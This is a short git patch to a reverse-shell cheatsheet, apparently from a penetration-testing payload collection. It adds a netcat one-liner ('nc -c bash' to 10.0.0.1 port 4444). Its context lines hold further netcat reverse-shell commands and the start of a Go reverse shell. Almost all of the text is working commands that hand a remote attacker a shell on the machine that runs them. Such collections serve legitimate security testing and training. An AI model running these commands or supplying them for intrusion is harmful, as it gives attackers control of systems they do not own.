From b54142c3a29410a7ee19130f80b1b7c6f07a7b85 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Mon, 21 Oct 2019 02:35:13 +0800 Subject: [PATCH] Update Reverse Shell Cheatsheet.md --- Methodology and Resources/Reverse Shell Cheatsheet.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 57e24be..cf91cc2 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -129,6 +129,7 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp"," ```bash nc -e /bin/sh [IPADDR] [PORT] nc.traditional -e /bin/bash 10.0.0.1 4444 +nc -c bash 10.0.0.1 4444 ``` ### Netcat OpenBsd